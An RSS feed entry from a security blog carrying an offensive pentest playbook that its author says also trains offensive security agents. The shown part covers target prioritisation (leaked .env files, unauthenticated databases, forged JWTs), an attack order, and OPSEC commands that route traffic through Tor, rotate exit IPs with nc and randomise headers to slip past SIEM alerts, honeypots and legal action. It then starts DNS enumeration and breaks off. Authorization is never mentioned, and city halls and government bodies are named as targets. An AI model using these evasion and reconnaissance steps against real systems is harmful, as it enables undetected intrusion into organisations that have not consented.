<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Pentest on Dotmind it</title><link>/tags/pentest/</link><description>Dotmind it (Pentest)</description><generator>Hugo -- gohugo.io</generator><language>en</language><managingEditor>alwaysdotmind@gmail.com
(Dotmind it. Building where things usually break)</managingEditor><lastBuildDate>Mon, 22 Jun 2026 16:20:00 +0000</lastBuildDate><atom:link href="/tags/pentest/index.xml" rel="self" type="application/rss+xml"/><item><title>The Practical Pentest Playbook</title><link>/posts/2026/ai/pentest-playbook/</link><pubDate>Mon, 22 Jun 2026 16:20:00 +0000</pubDate><author>alwaysdotmind@gmail.com (Dotmind it. Building where things usually break)</author><guid>/posts/2026/ai/pentest-playbook/</guid><description>&lt;!-- Finding and Exploiting Exposed Web and Cloud Assets --&gt;
&lt;hr&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Author&amp;rsquo;s Note:&lt;/strong&gt; This playbook is a living document updated continuously as new techniques are validated in the field. If a technique is here, it shipped results. The content of this playbook is also used to train and fine-tune offensive security agents, making the knowledge directly executable. Contributions, corrections, and new findings are always welcome.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h1 id="playbook---pentest--recon" &gt;
&lt;div&gt;
&lt;a href="#playbook---pentest--recon"&gt;
##
&lt;/a&gt;
PLAYBOOK - PENTEST &amp;amp; RECON
&lt;/div&gt;
&lt;/h1&gt;
&lt;p&gt;Technical guide to methodology, techniques, risks, and automation for offensive pentests.
Based on real field experience across 100+ targets — city halls, government, healthtech, logistics, fintech, e-commerce, ISPs, universities, game publishers, IP cameras, and more.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="index" &gt;
&lt;div&gt;
&lt;a href="#index"&gt;
#
&lt;/a&gt;
INDEX
&lt;/div&gt;
&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="#1-philosophy--mindset"&gt;Philosophy &amp;amp; Mindset&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#2-preparation--opsec"&gt;Preparation &amp;amp; OPSEC&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#3-passive-reconnaissance"&gt;Passive Reconnaissance&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#4-active-reconnaissance--nmap-masscan-and-rustscan"&gt;Active Reconnaissance — Nmap, Masscan, and RustScan&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#5-web-enumeration"&gt;Web Enumeration&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#6-js-bundle--source-map-analysis"&gt;JS Bundle &amp;amp; Source Map Analysis&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#7-wordpress-deep-dive"&gt;WordPress Deep Dive&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#8-laravel-spring-boot-aspnet--other-frameworks"&gt;Laravel, Spring Boot, ASP.NET, Exchange &amp;amp; Other Frameworks&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#9-cloud-functions--serverless-gcp-aws"&gt;Cloud Functions &amp;amp; Serverless (GCP, AWS)&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#10-firebase-firestore--gcp-exploitation"&gt;Firebase, Firestore &amp;amp; GCP Exploitation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#11-supabase-exploitation"&gt;Supabase Exploitation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#12-cloud-run-containers--artifact-registry"&gt;Cloud Run, Containers &amp;amp; Artifact Registry&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#13-s3--minio--blob-storage"&gt;S3 / MinIO / Blob Storage&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#14-code-leaks--github-gitlab-docker-hub-npm"&gt;Code Leaks — GitHub, GitLab, Docker Hub, NPM&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#15-authentication--bypass"&gt;Authentication &amp;amp; Bypass&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#16-jwt--complete-attacks"&gt;JWT — Complete Attacks&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#17-cors-misconfiguration"&gt;CORS Misconfiguration&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#18-web-cache-poisoning--web-cache-deception"&gt;Web Cache Poisoning &amp;amp; Web Cache Deception&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#19-ssrf-sqli-lfi--other-classes"&gt;SSRF, SQLi, LFI &amp;amp; Other Classes&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#20-exposed-infrastructure--mysql-redis-ftp-docker"&gt;Exposed Infrastructure — MySQL, Redis, FTP, Docker&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#21-docker-privilege-escalation"&gt;Docker Privilege Escalation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#22-python-snippets--automation"&gt;Python Snippets &amp;amp; Automation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#23-email-security--dmarc-spf-dkim"&gt;Email Security — DMARC, SPF, DKIM&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#24-subdomain-takeover--dns"&gt;Subdomain Takeover &amp;amp; DNS&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#25-advanced-field-techniques"&gt;Advanced Field Techniques&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#26-advanced-techniques--part-2"&gt;Advanced Techniques — Part 2&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#27-report--triage-methodology"&gt;Report &amp;amp; Triage Methodology&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#28-final-checklist"&gt;Final Checklist&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#29-essential-tools"&gt;Essential Tools&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#30-technique-effectiveness-summary"&gt;Technique Effectiveness Summary&lt;/a&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h2 id="1-philosophy--mindset" &gt;
&lt;div&gt;
&lt;a href="#1-philosophy--mindset"&gt;
#
&lt;/a&gt;
1. PHILOSOPHY &amp;amp; MINDSET
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="pentester-mindset" &gt;
&lt;div&gt;
&lt;a href="#pentester-mindset"&gt;
##
&lt;/a&gt;
Pentester Mindset
&lt;/div&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Work the edges&lt;/strong&gt;: don&amp;rsquo;t focus on what&amp;rsquo;s blocked, explore what&amp;rsquo;s open.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;One finding leads to another&lt;/strong&gt;: &lt;code&gt;.env&lt;/code&gt; → credentials → Firebase → GCP IAM → everything.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Don&amp;rsquo;t spam&lt;/strong&gt;: rate limiting burns your IP. 1 request every 2-3 seconds.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Document everything&lt;/strong&gt;: what you discover today may be useful tomorrow.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Think like a developer&lt;/strong&gt;: &amp;ldquo;Where would I put credentials? Where would I forget to lock down?&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Every target has something&lt;/strong&gt;: across 100+ tested targets, NONE was 100% secure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Prioritize what matters&lt;/strong&gt;: CRUD without auth &amp;gt; info disclosure &amp;gt; low severity.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="finding-value-hierarchy" &gt;
&lt;div&gt;
&lt;a href="#finding-value-hierarchy"&gt;
##
&lt;/a&gt;
Finding Value Hierarchy
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.env / .git exposed → 🔥🔥🔥 full access to credentials
CRUD without auth (API, Firestore, Supabase) → 🔥🔥🔥 bulk data, write
Firebase / Supabase public anon key → 🔥🔥🔥 full collection dump
Leaked source code (public GitLab, Vite dev) → 🔥🔥🔥 secrets, logic, endpoints
Cloud Function without auth (GET + DELETE) → 🔥🔥🔥 leakage + destruction
Exposed RSA private key → 🔥🔥 forge JWT (if jti in DB)
JWT secret hardcoded in JS bundle → 🔥🔥 forge any user&amp;#39;s tokens
APP_DEBUG=true in production → 🔥🔥 stack traces, SQL, paths
Exposed logs (laravel.log, debug.log) → 🔥🔥 tokens, emails, queries
Public Cloud Run without auth → 🔥🔥 execution without authentication
Leaked IAM policy via SA key → 🔥🔥 owners, editors, service accounts
MySQL/Postgres exposed to the internet → 🔥🔥 brute force, known CVEs
DMARC p=none → 🔥🔥 total email spoofing
CORS with origin reflection + credentials → 🔥🔥 cross-origin data theft
Web Cache Deception (WCD) → 🔥🔥 authenticated data theft
Active WordPress XML-RPC (80 methods) → 🔥🔥 unlimited brute force
SQLi (even blind) → 🔥🔥 data extraction
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="exploration-order" &gt;
&lt;div&gt;
&lt;a href="#exploration-order"&gt;
##
&lt;/a&gt;
Exploration Order
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;1. Port scan (RustScan/Masscan) on direct IP
2. Test /.env, /.git/config, /Dockerfile, /storage/oauth-private.key
3. If credentials found → authenticate and escalate
4. Analyze JS bundles for API keys, JWTs, internal endpoints
5. Test CORS, cache poisoning, WCD
6. If Firebase found → test public Firestore + Storage
7. If Supabase found → list tables with anon key
8. If GCP SA key found → IAM policy, Storage, Firestore
9. With cloud access → list functions, containers, artifact registry
10. Document everything and prioritize by impact
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="2-preparation--opsec" &gt;
&lt;div&gt;
&lt;a href="#2-preparation--opsec"&gt;
#
&lt;/a&gt;
2. PREPARATION &amp;amp; OPSEC
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="proxyvpn--protection-layer" &gt;
&lt;div&gt;
&lt;a href="#proxyvpn--protection-layer"&gt;
##
&lt;/a&gt;
Proxy/VPN — Protection Layer
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;There are 3 levels of identity protection:&lt;/p&gt;
&lt;h4 id="level-1-proxychains-fast-but-bypassable" &gt;
&lt;div&gt;
&lt;a href="#level-1-proxychains-fast-but-bypassable"&gt;
###
&lt;/a&gt;
Level 1: ProxyChains (fast, but bypassable)
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt install proxychains4 tor
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Config: /etc/proxychains4.conf → socks5 127.0.0.1 9050&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;proxychains4 curl ifconfig.me
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Limitations&lt;/strong&gt;: Does not work with Go/Rust binaries (static). UDP leaks. DNS can leak.&lt;/p&gt;
&lt;h4 id="level-2-proxy-ns-kernel-level-impossible-to-escape" &gt;
&lt;div&gt;
&lt;a href="#level-2-proxy-ns-kernel-level-impossible-to-escape"&gt;
###
&lt;/a&gt;
Level 2: proxy-ns (kernel-level, impossible to escape)
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git clone https://github.com/OkamiW/proxy-ns.git /tmp/proxy-ns
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;cd&lt;/span&gt; /tmp/proxy-ns
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;CGO_ENABLED&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;0&lt;/span&gt; make
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo cp proxy-ns /usr/local/bin/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Forces all traffic through Tor using kernel network namespace&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo proxy-ns curl -s ifconfig.me &lt;span style="color:#737994;font-style:italic"&gt;# Single command&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo proxy-ns &lt;span style="color:#f2d5cf"&gt;$SHELL&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Entire shell via Tor&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Advantages&lt;/strong&gt;: Go/Rust binaries work, UDP protected, DNS isolated, direct route impossible.&lt;/p&gt;
&lt;h4 id="tor-circuit-rotation-change-ip" &gt;
&lt;div&gt;
&lt;a href="#tor-circuit-rotation-change-ip"&gt;
###
&lt;/a&gt;
Tor Circuit Rotation (change IP)
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Enable ControlPort in /etc/tor/torrc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ControlPort &lt;span style="color:#ef9f76"&gt;9051&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;CookieAuthentication &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Rotate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; -e &lt;span style="color:#a6d189"&gt;&amp;#34;AUTHENTICATE\r\nSIGNAL NEWNYM&amp;#34;&lt;/span&gt; | nc -w1 127.0.0.1 &lt;span style="color:#ef9f76"&gt;9051&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sleep &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo proxy-ns curl -s ifconfig.me &lt;span style="color:#737994;font-style:italic"&gt;# New IP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="stealth-headers-python" &gt;
&lt;div&gt;
&lt;a href="#stealth-headers-python"&gt;
##
&lt;/a&gt;
Stealth Headers (Python)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;random&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;UAS &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1.15&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;headers &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;User-Agent&amp;#34;&lt;/span&gt;: random&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;choice(UAS),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Accept&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Accept-Language&amp;#34;&lt;/span&gt;: random&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;choice([&lt;span style="color:#a6d189"&gt;&amp;#34;pt-BR,pt;q=0.9&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;en-US,en;q=0.5&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Accept-Encoding&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;gzip, deflate&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DNT&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Connection&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;keep-alive&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Upgrade-Insecure-Requests&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sleep(random&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;uniform(&lt;span style="color:#ef9f76"&gt;2&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;6&lt;/span&gt;)) &lt;span style="color:#737994;font-style:italic"&gt;# Jitter between requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="real-exposure-risks" &gt;
&lt;div&gt;
&lt;a href="#real-exposure-risks"&gt;
##
&lt;/a&gt;
Real Exposure Risks
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Risk&lt;/th&gt;
&lt;th&gt;How It Happens&lt;/th&gt;
&lt;th&gt;Consequence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Leaked IP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Server logs, WebRTC, DNS leaks&lt;/td&gt;
&lt;td&gt;Blocking, tracking&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Fingerprinting&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;User-Agent, TLS fingerprint (JA3), headers&lt;/td&gt;
&lt;td&gt;Identified as bot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rate Limit&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Too many requests in a short period&lt;/td&gt;
&lt;td&gt;IP permanently blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Honeypot&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fake endpoint that alerts the security team&lt;/td&gt;
&lt;td&gt;Legal action&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SIEM/Splunk&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Centralized logs detect patterns&lt;/td&gt;
&lt;td&gt;Security team alerted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cloudflare WAF&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Many sequential 403/503&lt;/td&gt;
&lt;td&gt;IP added to blacklist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Tracked SA Key&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Excessive service account usage&lt;/td&gt;
&lt;td&gt;Key revoked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GitHub API&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Too many queries on the search API&lt;/td&gt;
&lt;td&gt;Rate limit, token revoked&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="pre-test-opsec-checklist" &gt;
&lt;div&gt;
&lt;a href="#pre-test-opsec-checklist"&gt;
##
&lt;/a&gt;
Pre-Test OPSEC Checklist
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] VPN/Tor active?
[ ] IP leaking? (check https://ipleak.net)
[ ] DNS leaking?
[ ] WebRTC disabled?
[ ] Generic and rotating User-Agent?
[ ] Random delay between requests?
[ ] GitHub credentials logged in only when needed?
[ ] Using Nmap -sT (SYN scan unsupported via proxy)?
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="3-passive-reconnaissance" &gt;
&lt;div&gt;
&lt;a href="#3-passive-reconnaissance"&gt;
#
&lt;/a&gt;
3. PASSIVE RECONNAISSANCE
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="dns-enumeration" &gt;
&lt;div&gt;
&lt;a href="#dns-enumeration"&gt;
##
&lt;/a&gt;
DNS Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# CT logs (crt.sh) — BEST SOURCE OF SUBDOMAINS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://crt.sh/?q=%25.&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;amp;output=json&amp;#34;&lt;/span&gt; | jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.[].name_value&amp;#39;&lt;/span&gt; | sed &lt;span style="color:#a6d189"&gt;&amp;#39;s/\*\.//g&amp;#39;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Subdomain brute force (with rate control)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; sub in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;cat ~/wordlists/subdomains.txt&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; host &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$sub&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; 2&amp;gt;/dev/null | grep &lt;span style="color:#a6d189"&gt;&amp;#34;has address&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sleep 0.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DNS zone transfer (rare, but always test)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; ns in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;host -t ns &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#34; &amp;#34;&lt;/span&gt; -f4&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dig axfr @&lt;span style="color:#f2d5cf"&gt;$ns&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Resolve all discovered subdomains&lt;/span&gt;
